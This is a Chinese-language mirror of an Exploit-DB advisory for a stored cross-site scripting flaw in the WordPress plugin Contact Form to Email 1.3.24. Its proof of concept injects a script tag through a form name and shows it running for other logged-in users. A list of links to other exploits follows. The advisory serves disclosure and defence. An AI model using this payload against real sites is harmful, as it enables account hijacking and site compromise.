WordPress Plugin Contact Form to Email 1.3.24 – Stored Cross Site Scripting (XSS) (Authenticated)

Exploit Database
55 阅读

作者： Mohammed Aadhil Ashfaq

日期： 2021-11-15
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/50524/

# Exploit Title: WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated)
# Date: 11/11/2021
# Exploit Author: Mohammed Aadhil Ashfaq
# Vendor Homepage: https://form2email.dwbooster.com/
# Version: 1.3.24
# Tested on: wordpress

POC
1. Click Contact form to Email
http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail
2. Create new form name with <script>alert(1)</script>
3. Click Publish
4. XSS has been triggered
http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail&pwizard=1&cal=4&r=0.8630795030649687
5. Open a different browser, logged in with wordpress. Copy the URL and
Press enter. XSS will trigger.

last Exploits
WordPress Plugin Contact Form to Email 1.3.24 – Stored Cross Site Scripting (XSS) (Authenticated)的更多信息

Vivotek IP Cameras – RTSP Authentication Bypass：
WordPress Plugin Photo Album Plus 4.1.1 – SQL Injection：
Green Shop – SQL Injection：
wpQuiz 2.7 – Authentication Bypass：
NetGain EM 7.2.647 build 941 – Authentication Bypass / Local File Inclusion：
Allomani Super MultiMedia 2.5 – Cross-Site Request Forgery (Add Admin)：
Netgear Routers – Password Disclosure：
FluxBB < 1.5.6 - SQL Injection：